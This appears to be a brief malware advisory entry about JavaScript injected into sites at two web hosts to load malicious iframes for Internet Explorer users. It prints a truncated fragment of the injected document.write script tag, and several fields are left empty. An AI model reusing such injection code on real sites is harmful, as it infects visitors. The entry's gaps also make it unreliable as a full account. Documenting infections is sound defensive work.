Description: Code used to insert a malicious javascript into many
sites hosted at Rackspace and Mediatemple. This javascript is decoded to load iframes
from multiple web sites (eg., etc).

Infection: It infects a javascript file to only load malware to IE users. The following backdoors are being used:

Clean up: Contact for help.

Malware dump:document.write('<script type="text/javascript" src="/wp-cont...